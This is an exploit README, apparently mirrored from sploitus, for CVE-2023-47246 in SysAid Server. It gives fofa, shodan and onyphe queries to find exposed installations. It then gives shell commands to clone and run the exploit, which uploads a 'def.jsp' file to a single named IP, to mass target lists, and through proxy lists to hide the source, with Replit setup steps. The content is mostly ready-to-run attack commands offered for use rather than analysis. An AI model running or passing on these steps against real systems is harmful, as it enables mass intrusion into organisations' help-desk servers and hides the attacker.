Share
## https://sploitus.com/exploit?id=31D0B7D1-9AB7-56F9-94D3-8F52B74793DD
# Vulnerability details
## Clone on replit:
[![Run on Replit](https://replit.com/badge/github/tucommenceapousser/CVE-2023-47246)](https://replit.com/github/tucommenceapousser/CVE-2023-47246)
1. fofa:
```text
body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
```
shodan
```
http.favicon.hash:1540720428
```
onyphe.io
[https://www.onyphe.io/search?q=category%3Adatascan+cpe%3A%22cpe%3A%2Fa%3Asysaid%3Ahelp_desk_software%3A-%22&g-recaptcha-response=03AFcWeA4VpQc5UkjerpJN4kqs4NuRTBE29ETcWwuCe_m7z9mois24KksasmCqHjKpxiqSfOFQbQyiE75p4ep5BmmV_E84sYo1qVr0MD5ZI3N4Cl3E12H0Mzg-BQcL7162ubWtvlKd6LxqbWgF9eejffE7iBoGsLsQap-e2STsDz-kIWCxXftSKOaNVpSKCR9HUa7N1xZshO-0LQqKhfggsSWVi7SZI7gXqo016j4Fn-qkJ59MEpBbt3GCGsAuw4pokNe0kbuQeNErxqRPsRau9JaCjqnVhCq7usf_kl9ZR2D5p6Jd16FhezGLI3TNQCruvVd9OYJbI5BYYj49Z_WQ4ZYw0BXZyY8zH1qqCubKf9R8-YeXrEAK7ey3Kr7mTPyuqJvtN0r-umi7jYLYXDQGoXKOCwSXcBBUcwMOWuU2Q5Bs8ICDL3ZekNjeCkPM9ATqD6IKjiztjSm4uaWlgob8RkLArTWUypLAArcxTs3wYTApWofwV8nuC_0KuSM4o-LSwM6fV0VW_kCv8-OzTVx9h5QeobTFMTLXWy3gDOaicaMuvVvFX5Xqsw4CmZR5-2k5VhXKB7izzoar
](https://t.co/oeRLgORoIv)
2. Affected versions: SysAid Server<23.3.36
# Vulnerability recurrence
1. Execute the script:
33 Mode Single
```shell
git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
cd CVE-2023-47246
pip install -r requirements.txt
chmod +x expp
./expp -u https://170.82.173.30:443 -f def.jsp
```
## Mode Mass
```shell
git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
cd CVE-2023-47246
pip install -r requirements.txt
chmod +x expp
./expp -m urls.txt -f def.jsp
```
## Mode Proxy-List
```shell
git clone https://github.com/tucommenceapousser/CVE-2023-47246.git
cd CVE-2023-47246
pip install -r requirements.txt
chmod +x exp
./exp -m urls.txt --proxy-list proxies.txt -f def.jsp
```
2. result:![](https://static-trkn.replit.app/47246.jpg)
# On replit
change the first lign of exp
```
#!venv/bin/python
```
use this command
```
python -m venv venv
```
```
source venv/bin/activate
```
```
chmod +x exp
```
```
exp -m urls.txt -f def.jsp
```
# Reference
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability